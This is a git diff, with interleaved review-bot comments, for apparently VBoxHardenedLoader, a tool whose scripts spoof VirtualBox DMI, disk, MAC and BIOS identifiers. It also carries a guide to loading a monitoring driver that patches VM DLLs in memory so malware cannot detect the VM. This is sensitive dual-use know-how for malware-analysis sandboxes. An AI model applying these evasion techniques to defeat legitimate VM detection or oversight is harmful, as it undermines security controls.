"VBoxInternal/Devices/acpi/0/Config/DsdtFilePath" "%vmscfgdir%ACPI-DSDT.bin" -%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT1.bin" -%vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%videorom.bin" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/BiosRom" "%vmscfgdir%pcbios.bin" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/LanBootRom" "%vmscfgdir%pxerom.bin" - +%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT.bin" +%vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%vgabios386.bin" +%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/BiosRom" "%vmscfgdir%pcbios386.bin" @pause diff --git a/Binary/data/hidevm_efiahci.cmd b/Binary/data/hidevm_efiahci.cmd index 0b6d443..52af5f3 100644 --- a/Binary/data/hidevm_efiahci.cmd +++ b/Binary/data/hidevm_efiahci.cmd 
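Review bot: In the `@@ -64,10 +67,8 @@` hunk the new BiosRom and SsdtFilePath values point at `pcbios386.bin`, `vgabios386.bin` and `ACPI-SSDT.bin` under `%vmscfgdir%`, but nothing verifies those files exist before the extradata is written, so a missing or misnamed ROM only surfaces later as a VM start failure instead of when this script runs. After the `cd /d %vmscfgdir%` line a guard per referenced file, e.g. `if not exist "%vmscfgdir%pcbios386.bin" (echo %vmscfgdir%pcbios386.bin not found & exit /b 1)`, would fail fast with a clear message. This diff adds only `efi_amd64_fixed_6.1.2.fd` to Binary/data, so whether `pcbios386.bin` and `vgabios386.bin` are shipped alongside is not visible from here and should be checked. The same applies to the corresponding hunks in hidevm_ide.cmd, hidevm_efiahci.cmd and hidevm_efiide.cmd. The added `VBoxInternal/CPUM/EnableHVP` line in the `@@ -8,6 +9,8 @@` hunk would also benefit from a `rem` stating why it is set to 0, since the key name alone does not tell a reader what it changes.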
@@ -1,6 +1,7 @@ rem @echo off rem EFI/AHCI mode +rem This script is for use with VBoxHardenedLoader v2+ rem vboxman is the full path to the vboxmanage executable rem vmscfgdir is the path to directory that keeps vbox custom configuration data (bioses, tables etc) @@ -8,6 +9,8 @@ rem vmscfgdir is the path to directory that keeps vbox custom configuration data set vboxman="C:\Program Files\Oracle\VirtualBox\vboxmanage.exe" set vmscfgdir=D:\Virtual\VBOX\Settings\ +%vboxman% setextradata "%1" "VBoxInternal/CPUM/EnableHVP" 0 + %vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSVendor" "Apple Inc." %vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSVersion" "MB52.88Z.0088.B05.0904162222" %vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseDate" "08/10/13" @@ -63,7 +66,8 @@ set vmscfgdir=D:\Virtual\VBOX\Settings\ cd /d %vmscfgdir% %vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/DsdtFilePath" "%vmscfgdir%ACPI-DSDT.bin" -%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT1.bin" -%vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%videorom.bin" +%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT.bin" +%vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%vgabios386.bin" +%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/EfiRom" "%vmscfgdir%efi_amd64_fixed_6.1.2.fd" @pause diff --git a/Binary/data/hidevm_efiide.cmd b/Binary/data/hidevm_efiide.cmd index 78ef4d8..ce8ff6b 100644 --- a/Binary/data/hidevm_efiide.cmd +++ b/Binary/data/hidevm_efiide.cmd @@ -1,6 +1,7 @@ rem @echo off rem EFI/IDE mode +rem This script is for use with VBoxHardenedLoader v2+ rem vboxman is the full path to the vboxmanage executable rem vmscfgdir is the path to directory that keeps vbox custom configuration data (bioses, tables etc) 
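Review bot: The new `EfiRom` line in the `@@ -63,7 +66,8 @@` hunk hard-codes `efi_amd64_fixed_6.1.2.fd`, a file whose name suggests it is built for one specific VirtualBox release, yet the only documentation added is the generic `rem This script is for use with VBoxHardenedLoader v2+` at the top. A user running a different VirtualBox version gets no hint from the script that the firmware image has to be replaced, and presumably a mismatched image leaves the VM unbootable — worth confirming against the loader's documentation. Propose a comment directly above the line: `rem EfiRom image is VirtualBox-version specific; keep it in step with the installed release`. The identical line is added to hidevm_efiide.cmd and needs the same comment.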
@@ -8,6 +9,8 @@ rem vmscfgdir is the path to directory that keeps vbox custom configuration data set vboxman="C:\Program Files\Oracle\VirtualBox\vboxmanage.exe" set vmscfgdir=D:\Virtual\VBOX\Settings\ +%vboxman% setextradata "%1" "VBoxInternal/CPUM/EnableHVP" 0 + %vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSVendor" "Apple Inc." %vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSVersion" "MB52.88Z.0088.B05.0904162222" %vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseDate" "08/10/13" @@ -62,7 +65,7 @@ set vmscfgdir=D:\Virtual\VBOX\Settings\ cd /d %vmscfgdir% %vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/DsdtFilePath" "%vmscfgdir%ACPI-DSDT.bin" -%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT1.bin" -%vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%videorom.bin" - +%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT.bin" +%vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%vgabios386.bin" +%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/EfiRom" "%vmscfgdir%efi_amd64_fixed_6.1.2.fd" @pause diff --git a/Binary/data/hidevm_ide.cmd b/Binary/data/hidevm_ide.cmd index 1682427..438b9db 100644 --- a/Binary/data/hidevm_ide.cmd +++ b/Binary/data/hidevm_ide.cmd @@ -1,6 +1,7 @@ rem @echo off rem BIOS/IDE mode +rem This script is for use with VBoxHardenedLoader v2+ rem vboxman is the full path to the vboxmanage executable rem vmscfgdir is the path to directory that keeps vbox custom configuration data (bioses, tables etc) 
@@ -8,6 +9,8 @@ rem vmscfgdir is the path to directory that keeps vbox custom configuration data set vboxman="C:\Program Files\Oracle\VirtualBox\vboxmanage.exe" set vmscfgdir=D:\Virtual\VBOX\Settings\ +%vboxman% setextradata "%1" "VBoxInternal/CPUM/EnableHVP" 0 + %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVendor" "Asus" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVersion" "MB52.88Z.0088.B05.0904162222" %vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseDate" "08/10/13" @@ -62,9 +65,8 @@ set vmscfgdir=D:\Virtual\VBOX\Settings\ cd /d %vmscfgdir% %vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/DsdtFilePath" "%vmscfgdir%ACPI-DSDT.bin" -%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT1.bin" -%vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%videorom.bin" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/BiosRom" "%vmscfgdir%pcbios.bin" -%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/LanBootRom" "%vmscfgdir%pxerom.bin" +%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT.bin" +%vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%vgabios386.bin" +%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/BiosRom" "%vmscfgdir%pcbios386.bin" @pause diff --git a/Binary/data/linux/hidevm_bios.sh b/Binary/data/linux/hidevm_bios.sh new file mode 100644 index 0000000..e84a7d4 --- /dev/null +++ b/Binary/data/linux/hidevm_bios.sh 
@@ -0,0 +1,61 @@
+#! /bin/sh
+
+vboxmanage setextradata "$1" "VBoxInternal/CPUM/EnableHVP" 0
+
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVendor" "LENOVO"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVersion" "N1MET31W (1.16 )"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseDate" "03/10/2017"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseMajor" "3"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseMinor" "91"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSFirmwareMajor" "3"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSFirmwareMinor" "91"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemVendor" "LENOVO"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemProduct" "20HQZ2YHUS"
+
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemVersion" "ThinkPad X1 Carbon 5th"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemSerial" "PF0N9BA2"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemSKU" "To Be Filled By O.E.M."
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemFamily" "To Be Filled By O.E.M."
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemUuid" "4C3C615B-D626-B211-A85C-C9A2E7368262"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardVendor" "LENOVO"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardProduct" "20HQZ2YHUS"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardVersion" "SDK0J40697 WIN"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardSerial" "L1HF6BG000Y"
+
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardAssetTag" "0123456789ABCDEF"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardLocInChass" "To Be Filled By O.E.M."
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardBoardType" 10
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisVendor" "LENOVO"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisType" 6
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisVersion" "To Be Filled By O.E.M."
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisSerial" "PF0N9BA2"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisAssetTag" "0123456789ABCDEF"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiOEMVBoxVer" "Extended version info: 3.00.00"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/DmiOEMVBoxRev" "Extended revision info: 1E"
+
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port0/ModelNumber" "THNSF5256GPUK TOSHIBA"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port0/FirmwareRevision" "51025KLA"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port0/SerialNumber" "96IS10F4T4UT"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port1/ModelNumber" "HL-DT-ST DVDRAM GUE2P"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port1/FirmwareRevision" "AS01"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port1/SerialNumber" "KRFG74G5310"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIVendorId" "Slimtype"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIProductId" "DVDRAM GUE2P"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIRevision" "AS01"
+
+vboxmanage setextradata "$1" "VBoxInternal/Devices/acpi/0/Config/AcpiOemId" "LENOVO"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "/home/user/vm/vgabios386.bin"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/BiosRom" "/home/user/vm/pcbios386.bin"
+
+vboxmanage modifyvm "$1" --paravirtprovider legacy
+vboxmanage modifyvm "$1" --chipset ich9
+vboxmanage modifyvm "$1" --macaddress1 2B49443BC482
+vboxmanage modifyvm "$1" --hwvirtex on
+vboxmanage modifyvm "$1" --vtxvpid on
+vboxmanage modifyvm "$1" --vtxux on
+vboxmanage modifyvm "$1" --apic on
+vboxmanage modifyvm "$1" --pae on
+vboxmanage modifyvm "$1" --longmode on
+vboxmanage modifyvm "$1" --hpet on
+vboxmanage modifyvm "$1" --nestedpaging on
+vboxmanage modifyvm "$1" --largepages on
\ No newline at end of file
diff --git a/Binary/data/linux/hidevm_efi.sh b/Binary/data/linux/hidevm_efi.sh
new file mode 100644
index 0000000..c8c3ebd
--- /dev/null
+++ b/Binary/data/linux/hidevm_efi.sh
@@ -0,0 +1,60 @@
+#! /bin/sh
+
+vboxmanage setextradata "$1" "VBoxInternal/CPUM/EnableHVP" 0
+
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSVendor" "LENOVO"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSVersion" "N1MET31W (1.16 )"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseDate" "03/10/2017"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseMajor" "3"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseMinor" "91"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSFirmwareMajor" "3"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSFirmwareMinor" "91"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiSystemVendor" "LENOVO"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiSystemProduct" "20HQZ2YHUS"
+
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiSystemVersion" "ThinkPad X1 Carbon 5th"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiSystemSerial" "PF0N9BA2"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiSystemSKU" "To Be Filled By O.E.M."
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiSystemFamily" "To Be Filled By O.E.M."
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiSystemUuid" "4C3C615B-D626-B211-A85C-C9A2E7368262"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBoardVendor" "LENOVO"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBoardProduct" "20HQZ2YHUS"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBoardVersion" "SDK0J40697 WIN"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBoardSerial" "L1HF6BG000Y"
+
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBoardAssetTag" "0123456789ABCDEF"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBoardLocInChass" "To Be Filled By O.E.M."
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiBoardBoardType" 10
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiChassisVendor" "LENOVO"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiChassisType" 6
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiChassisVersion" "To Be Filled By O.E.M."
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiChassisSerial" "PF0N9BA2"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiChassisAssetTag" "0123456789ABCDEF"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiOEMVBoxVer" "Extended version info: 3.00.00"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/DmiOEMVBoxRev" "Extended revision info: 1E"
+
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port0/ModelNumber" "THNSF5256GPUK TOSHIBA"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port0/FirmwareRevision" "51025KLA"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port0/SerialNumber" "96IS10F4T4UT"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port1/ModelNumber" "HL-DT-ST DVDRAM GUE2P"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port1/FirmwareRevision" "AS01"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port1/SerialNumber" "KRFG74G5310"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIVendorId" "Slimtype"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIProductId" "DVDRAM GUE2P"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIRevision" "AS01"
+
+vboxmanage setextradata "$1" "VBoxInternal/Devices/acpi/0/Config/AcpiOemId" "LENOVO"
+vboxmanage setextradata "$1" "VBoxInternal/Devices/efi/0/Config/EfiRom" "/home/user/vm/VBoxEFI64.fd"
+
+vboxmanage modifyvm "$1" --paravirtprovider legacy
+vboxmanage modifyvm "$1" --chipset ich9
+vboxmanage modifyvm "$1" --macaddress1 2B49443BC482
+vboxmanage modifyvm "$1" --hwvirtex on
+vboxmanage modifyvm "$1" --vtxvpid on
+vboxmanage modifyvm "$1" --vtxux on
+vboxmanage modifyvm "$1" --apic on
+vboxmanage modifyvm "$1" --pae on
+vboxmanage modifyvm "$1" --longmode on
+vboxmanage modifyvm "$1" --hpet on
+vboxmanage modifyvm "$1" --nestedpaging on
+vboxmanage modifyvm "$1" --largepages on
\ No newline at end of file
diff --git a/Binary/data/linux/readme.txt b/Binary/data/linux/readme.txt
new file mode 100644
index 0000000..003a4d7
--- /dev/null
+++ b/Binary/data/linux/readme.txt
@@ -0,0 +1,5 @@
+These are shell scripts examples to use on Linux.
+Both examples are for AHCI disk controller.
+
+Note that you must edit these scripts before usage.
+Replace all "/home/user/vm/" to the paths on your computer.
\ No newline at end of file
diff --git a/Binary/data/pcbios.bin b/Binary/data/pcbios386.bin
similarity index 55%
rename from Binary/data/pcbios.bin
rename to Binary/data/pcbios386.bin
index 1f00a87..da6a1b6 100644
Binary files a/Binary/data/pcbios.bin and b/Binary/data/pcbios386.bin differ
diff --git a/Binary/data/pxerom.bin b/Binary/data/pxerom.bin
deleted file mode 100644
index 15cb3d5..0000000
Binary files a/Binary/data/pxerom.bin and /dev/null differ
diff --git a/Binary/data/videorom.bin b/Binary/data/vgabios386.bin
similarity index 53%
rename from Binary/data/videorom.bin
rename to Binary/data/vgabios386.bin
index c39d8fc..8c0e1de 100644
Binary files a/Binary/data/videorom.bin and b/Binary/data/vgabios386.bin differ
diff --git a/Binary/help/10_script.png b/Binary/help/10_script.png
index 1f9f9e7..e11bd9d 100644
Binary files a/Binary/help/10_script.png and b/Binary/help/10_script.png differ
diff --git a/Binary/help/11_loader_before.png b/Binary/help/11_loader_before.png
new file mode 100644
index 0000000..1fa44fb
Binary files /dev/null and b/Binary/help/11_loader_before.png differ
diff --git a/Binary/help/11_tdl_tsugumi_before.png b/Binary/help/11_tdl_tsugumi_before.png
deleted file mode 100644
index 4b4d96c..0000000
Binary files a/Binary/help/11_tdl_tsugumi_before.png and /dev/null differ
diff --git a/Binary/help/12_loader_after.png b/Binary/help/12_loader_after.png
new file mode 100644
index 0000000..2288a53
Binary files /dev/null and b/Binary/help/12_loader_after.png differ
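Review bot: `--macaddress1 2B49443BC482` has the low bit of its first octet set (0x2B is odd), which makes it a multicast/group address rather than a valid unicast station address; that is an oddity a VM-detection check can key on and, from memory, something VBoxManage rejects outright, so any even first octet (e.g. `2A49443BC482`) is needed. The script also issues sixty `vboxmanage` calls with no check that a VM name was passed and no `set -e`, so a typo yields sixty errors and a half-configured VM, and the two `/home/user/vm/` ROM paths that readme.txt asks users to edit would be a single line if taken from a variable, mirroring `vmscfgdir` in the .cmd scripts. A header like the one below adds those guards while leaving the DMI/AHCI body untouched.
```sh
#! /bin/sh
set -eu
VMCFGDIR="/home/user/vm"
[ $# -eq 1 ] || { echo "usage: $0 <vmname>" >&2; exit 1; }
for rom in vgabios386.bin pcbios386.bin; do
    [ -r "$VMCFGDIR/$rom" ] || { echo "missing $VMCFGDIR/$rom" >&2; exit 1; }
done
# ... unchanged: CPUM / DMI / AHCI / ACPI setextradata lines ...
vboxmanage setextradata "$1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "$VMCFGDIR/vgabios386.bin"
vboxmanage setextradata "$1" "VBoxInternal/Devices/pcbios/0/Config/BiosRom" "$VMCFGDIR/pcbios386.bin"
# ... unchanged: modifyvm lines, except the MAC ...
vboxmanage modifyvm "$1" --macaddress1 2A49443BC482
```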
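Review bot: The `EfiRom` line points at `/home/user/vm/VBoxEFI64.fd`, which is the name of VirtualBox's stock firmware file, while the Windows EFI script in this commit references `efi_amd64_fixed_6.1.2.fd`; it may be intended as the patched copy renamed, but nothing in the script or readme.txt says so, and a user who only fixes the directory can boot the unpatched ROM with no error because setextradata just stores the string. Naming the patched file distinctly and checking it, `[ -r "$VMCFGDIR/efi_amd64_fixed_6.1.2.fd" ] || exit 1`, would catch that; the multicast-bit problem with `--macaddress1 2B49443BC482` noted for hidevm_bios.sh is duplicated here as well. Separately, every user of these scripts ends up with the identical DMI serials, UUID and disk serial published in this repository (`PF0N9BA2`, `4C3C615B-D626-B211-A85C-C9A2E7368262`, `96IS10F4T4UT`), which become a fingerprint of their own once a sandbox-evasion check learns them, so a header comment telling users to replace those values per installation, not only the paths, belongs in the script or readme.txt.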
diff --git a/Binary/help/12_tdl_tsugumi_after.png b/Binary/help/12_tdl_tsugumi_after.png deleted file mode 100644 index d8aee75..0000000 Binary files a/Binary/help/12_tdl_tsugumi_after.png and /dev/null differ diff --git a/Binary/help/13_loader_help.png b/Binary/help/13_loader_help.png deleted file mode 100644 index 0ec2c44..0000000 Binary files a/Binary/help/13_loader_help.png and /dev/null differ diff --git a/Binary/help/14_loader_start.png b/Binary/help/14_loader_start.png deleted file mode 100644 index e7145c8..0000000 Binary files a/Binary/help/14_loader_start.png and /dev/null differ diff --git a/Binary/help/15_loader_signed.png b/Binary/help/15_loader_signed.png deleted file mode 100644 index eb04064..0000000 Binary files a/Binary/help/15_loader_signed.png and /dev/null differ diff --git a/Binary/help/1_install.png b/Binary/help/1_install.png index edcc9a8..037a97b 100644 Binary files a/Binary/help/1_install.png and b/Binary/help/1_install.png differ diff --git a/Binary/help/2_createvm.png b/Binary/help/2_createvm.png index 1c8f56a..2bd6983 100644 Binary files a/Binary/help/2_createvm.png and b/Binary/help/2_createvm.png differ diff --git a/Binary/help/3_createhdd.png b/Binary/help/3_createhdd.png index 30f196a..07812a8 100644 Binary files a/Binary/help/3_createhdd.png and b/Binary/help/3_createhdd.png differ diff --git a/Binary/help/4_settings_mb.png b/Binary/help/4_settings_mb.png index 5364b71..a439402 100644 Binary files a/Binary/help/4_settings_mb.png and b/Binary/help/4_settings_mb.png differ diff --git a/Binary/help/5_settings_cpu.png b/Binary/help/5_settings_cpu.png index 2fe2f4c..c8406ea 100644 Binary files a/Binary/help/5_settings_cpu.png and b/Binary/help/5_settings_cpu.png differ diff --git a/Binary/help/6_settings_accel.png b/Binary/help/6_settings_accel.png index 393865a..d1ac308 100644 Binary files a/Binary/help/6_settings_accel.png and b/Binary/help/6_settings_accel.png differ 
diff --git a/Binary/help/7_display.png b/Binary/help/7_display.png index 13f1c46..6bdbfb9 100644 Binary files a/Binary/help/7_display.png and b/Binary/help/7_display.png differ diff --git a/Binary/help/7_display2.png b/Binary/help/7_display2.png new file mode 100644 index 0000000..0d223e9 Binary files /dev/null and b/Binary/help/7_display2.png differ diff --git a/Binary/help/8_storage.png b/Binary/help/8_storage.png index e59a9b9..6fc4abb 100644 Binary files a/Binary/help/8_storage.png and b/Binary/help/8_storage.png differ diff --git a/Binary/help/9_network.png b/Binary/help/9_network.png index b3775fc..f1a9a62 100644 Binary files a/Binary/help/9_network.png and b/Binary/help/9_network.png differ diff --git a/Binary/help/vbox6_efibug_workaround.png b/Binary/help/vbox6_efibug_workaround.png deleted file mode 100644 index 60b0c69..0000000 Binary files a/Binary/help/vbox6_efibug_workaround.png and /dev/null differ diff --git a/Binary/install.md b/Binary/howto.md similarity index 66% rename from Binary/install.md rename to Binary/howto.md index 00a5c0c..aee29cc 100644 --- a/Binary/install.md +++ b/Binary/howto.md @@ -1,6 +1,8 @@ # Installation guide -Step by step guide for VirtualBox x64 Hardened (5.1.16+) VM detection mitigation configuring. +Step by step guide for VM detection mitigation configuring using VirtualBox x64 Hardened loader v2. + +Note: Minimum required VirtualBox version is 6.1.2 Contents: @@ -8,7 +10,7 @@ Contents: * Creating VM with required settings * Using batch script to apply fake VM system information * Loading monitoring driver for load-in-memory VM dll patch - * Using VirtualBox loader to manage monitoring driver behavior + * Stopping monitoring driver * Warning: VirtualBox Additions * Appendix A: Using EFI VM * Appendix B: Uninstalling VirtualBox loader 
@@ -26,19 +28,19 @@ Contents: ### Step 2. Creating VM with required setting -In this example we are installing and configuring VirtualBox on x64 notebook with 6Gb of RAM and 4x Intel Core i7 Haswell CPU running full patch Windows 8.1. +In this example we are installing and configuring VirtualBox on x64 PC running full patch Windows 8.1. Create a new virtual machine (in this example it will be named "vm0") and configure it in the following way: -Note: 512 Mb is not requirement, you can adjust or lower this value as you want, but keep in mind - some lame malware attempt to detect VM by available physical memory size, and if its too low - use it as VM detection flag. +Note: 2048 Mb is not requirement, you can adjust or lower this value as you want, but keep in mind - some lame malware attempt to detect VM by available physical memory size, and if its too low - use it as VM detection flag. Setup Virtual disk -Note: 64 Gb is not requirement however yet again some lame malware attempt to detect VM by hard disk size, so give it reasonable size. +Note: 32 Gb is not requirement and just used as example, however yet again some lame malware attempt to detect VM by hard disk size, so give it reasonable size (>32 Gb). After VM (vm0 is our case) created, open it setting and do some changes. 
@@ -128,32 +130,21 @@ Do not run any VM, as it is not ready yet. Close VirtualBox if it opened. -Open elevated command line prompt. Run cmd.exe as admin and switch current directory to C:\VBoxLdr (or where you saved Binary folder). Use tdl.exe to load monitoring driver, type as below on screenshot: +Open elevated command line prompt. Run cmd.exe as admin and switch current directory to C:\VBoxLdr (or where you saved Binary folder). Use loader.exe to start monitoring, type as below on screenshot: - + Upon successful execution you will see something like that: - + -Done, monitoring driver loaded. Now we need to properly configure it. Do not start VirtualBox as we didn't finished yet. +Done, monitoring driver loaded and configured. You will have to repeat this (and only) step each time you boot Windows, because monitoring driver will be unloaded automatically upon system shutdown/reboot. -### Step 5. Using VirtualBox loader to manage monitoring driver behavior +### Step 5. Stopping monitoring driver. Close VirtualBox if it opened. -We need to give our monitoring driver proper data to work with. Loader.exe is the application that does this. Running it with /? will give you small help on it usage. - - -So we will just run it without parameters. In same elevated command line prompt type loader and press Enter, upon succesful execution you will see something like that: - - - -That's is all. Now you can start VirtualBox and load prepared VM. - -If you want to stop monitoring driver, open elevated command line prompt, navigate to VBoxLdr folder and run loader with /s switch, e.g. loader.exe /s. To reenable monitoring just re-run loader without parameters elevated (as admin). -Monitoring driver will be unloaded at Windows shutdown or reboot. To start it again repeat step 4 (step 5 repeat is only needed when you decided to upgrade VirtualBox without uninstalling previous version and rebooting). 
